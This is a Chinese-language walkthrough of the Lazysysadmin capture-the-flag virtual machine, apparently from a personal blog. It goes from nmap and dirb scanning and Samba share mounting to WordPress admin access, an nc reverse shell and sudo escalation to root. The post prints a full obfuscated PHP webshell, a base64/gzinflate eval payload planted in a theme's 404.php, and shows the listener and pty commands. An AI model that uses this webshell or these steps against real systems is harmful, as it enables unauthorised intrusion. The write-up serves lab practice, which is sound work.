Lazysysadmin靶机实战

  • 内容
  • 相关

靶机实战 - Lazysysadmin

靶机链接: https://pan.baidu.com/s/1eLFOW0q8a9L553anRE20hA 提取码: 8820

攻击IP(Kali) - 192.168.224.139

被攻击IP(Lazysysadmin,通过主机发现) - 192.168.224.138

目标:拿到服务器root权限,并以root用户身份登录服务器

主机发现

netdiscover -r 192.168.224.0/24

或者

nmap -sn 192.168.224.0/24
  • 因为攻击机和被攻击机采用net模式连接网络,虚拟机网络设置里面可以看到net模式分配的ip段为192.168.224.0/24,所以进行主机发现只要扫描该网段就行。

screenShot.png

检查该IP开放端口,并进行服务识别

nmap -v -A -T4 192.168.224.138

对扫描结果进行分析

SSH服务(22)

  • 可以考虑爆破,如果知道用户名的话,不知道也可以,但是非常浪费时间

WEB 服务(80)

  • 80端口是WEB服务,robots.txt规则中存在不允许访问的目录

  • 访问这几个目录都没有发现有价值的信息
  • 使用dirb工具进行目录扫描
  • dirb http://192.168.224.138
  • 扫描到以上目录信息

  • 先访问一下info.php,是一个phpinfo信息泄露
  • 接着访问wordpress,一直提示博主叫togie

  • 那么刚才ssh部分用户名就很有可能是togie了,或者其他登录服务的用户名是togie了
  • 看见署名为admin,猜测后台账号可能是admin
  • 1566647200458

  • 尝试访问wordpress后台路径(刚才扫描出来了)http://192.168.224.138/wordpress/wp-admin

  • 尝试爆破~失败

  • 访问http://192.168.224.138/phpmyadmin/,是数据库管理工具,懒得爆破了

Samba服务(139,445)

  • 使用enum4linux枚举samba主机信息

  • 发现允许任意用户登录

  • 发现存在共享目录与打印机

  • 远程挂载共享目录sudo mount -t cifs -o username="",password="" //192.168.224.138/share$ /mnt

  • 挂载的是网站目录

  • 找到了wp-config.php文件

  • 发现数据库账号和密码

  • 尝试直接往里面挂大马,发现没有写入权限,只得从数据库下手了

  • 从刚才找到的phpmyadmin登录

  • 虽然登录成功,但是没有权限

  • 尝试登录用户后台...居然成功了...

    1566650678328

  • 登录成功后,把这个页面设置成了中文~看着舒服

  • 然后尝试写个大马,wp允许编辑php文件来编辑主题,研究了半天觉得还是404页面靠谱

    ```php <?php $password='admin';//登录密码

$html='$password'.'='."'".$password."';".'@e#html'.''.'v'."".''.''."".''.''.''.'a'.''.'l('.'g'.''."".''.''.'z'.'i'.''.''.'n'.'f'.'l'.''.''."".'a'.'t'.'e(b'.'as'.''.''.''."".''.'e'.'6'.''."".''."".""."".''.'4_'.'d'.'e'.'c'.''.''.''."".''."".'o'.'d'.'e'.'('."'lVZhb5tIEP0eKf9hg6ICEufgXBy1sSI1TTHJKcY5jJsmbYTwspitMUt3SWiT+r/fLLZjjN3UxxfE7sybN29nZtndIZwz7nOSMZ7TdKSZent3RxAhKEt9kQc81+QKjZC2R4Ugubbv961+/7LnfFGyOAsyqtzrOnre3UHw7GN0ilS1Pf96EIQHI5LmcrXLnmiSBAdHDRNpmE2yIKfDhLRRt39poeOG2UY3NA1ZIZDjoVbjUF/i8AQQhoEgx0d+SDALibb6pdwO4n7Xdqzh33fdrvnP460Z2uFhx3M+f6DDT9mhd5G5odn66Ny04k/N8bvz0empouuVCA4p6jGUq6cP10M7iYOmexl8dv7t2XHRtTtjbI9a2O4UgTfg+Ntdcns4Lm69uBXcZPndU/JIbKfo3Tg8nMSTq0JGmgeSQkYPKc6lvuQHFbnQ1EgwPGYZSdWlkiWrhKZjSDwLuCA+UNQkzwVUafH9gfCfYFKaflFB01i9rxrETEj1Rc5zlrCCcG1uKjfU+xWwKAPLFzJa6Wugt6aB9qFOUjZ7A5SBmmbVU2YF3ivkS0T2IIMrtuWhg+cZ2Sm68Lzrg2bD/Mq/pkp7g0cDXC4g9gl6LjlMX7UcQJH9dSar7AT9/xp7FfqcpSkpz+oEnSdMEGm9ySMqOM2J1MAovfU6Ik1jEoSEgxrN+h5maQ7shVSqDlzENCHQexFhUSnxmsaLQiHy7EYE6qlkcWS+O66zeDmqJZtTZG5EXCXWmBUY2YA3/VOIN2+QNucH+YF06NcvVFmQauq/51ARzvxz+NpnhOWhlbqtiS6bZpFgZXOOMF226x4UfMZAVmws5oQus1prYwybPk1prr6yT34QXG9zHAOZF2+tyrVchbHLMpi8ODbQ+cC96l17PrxmdLay9i67Vm/gQd+2trJ3LW/gOp575vQ7lmsgzx1Y29HqW+6ZbTmeUZn+K0MGL3KVSkjnNdz5oS13tjgMEM6H4tfUIIEpJ2elH22aqDmZZLLR3kfQV2vjtIwAFvlPbWap6xvK5j2dZIm8HlTVmCOugVRoKiFJPlJ+loYdiKlshpR0ZAL+oiRXuFUE2JT/HjRSFCSC1MpqNvfl7Z4EeJYt2AMjBZzxyqmsX+rgPHqiaZQEef2yBd8Ks+ns92CLvwPyGCQbLQBs+h8=')));";$css=base64_decode("Q3JlYXRlX0Z1bmN0aW9u");$style=$css('',preg_replace("/#html/","",$html));$style();/));.'<linkrel="stylesheet"href="$#css"/>';/ ```

  • 理论上访问一个不存在的页面就应该直接404,但是可能由于我整个php重写的大马导致404没有成功,

  • 不过通过刚才挂载的目录可以找到模板目录的绝对路径

  • 访问模板目录http://192.168.224.138/wordpress/wp-content/themes/twentyfifteen/404.php

  • 成功访问大马

  • 登录后使用大马反弹shell

  • kali监听nc -nvlp 1234

  • 大马反弹shell

  • 连接成功

    使用python -c 'import pty; pty.spawn("/bin/bash")'切换bash面板(为了好看)

  • 看了一下用户权限:www-data

  • 并非root权限,看一下密码文件所需权限,好吧,root

  • 此路不通,回头再看看共享文件夹,发现了一个密码

  • 好像是部署服务器后忘了删除,尝试ssh登录,之前不是知道了一个疑似的账号togie嘛~

  • 登录成功

  • 先看权限,发现这个账户在sudo用户组,直接切换到root用户sudo su root

  • 修改root密码

  • 使用root用户登录

到此渗透完成

总结

这个靶机设计地不够好,有以下几点:

  1. togie用户的密码应该设计地更加复杂,不能被爆破
  2. togie用户的密码文件应该放在只有登录www-data用户才能读取的文件夹,而不是放在共享文件夹

本文标签:

版权声明:若无特殊注明,本文皆为《Dreamn》原创,转载请联系站长获得授权。

本文链接:Lazysysadmin靶机实战 - https://dreamn.cn/post/25

发表评论

电子邮件地址不会被公开。 必填项已用*标注

未显示?请点击刷新

允许邮件通知
00:00 / 00:00
随机播放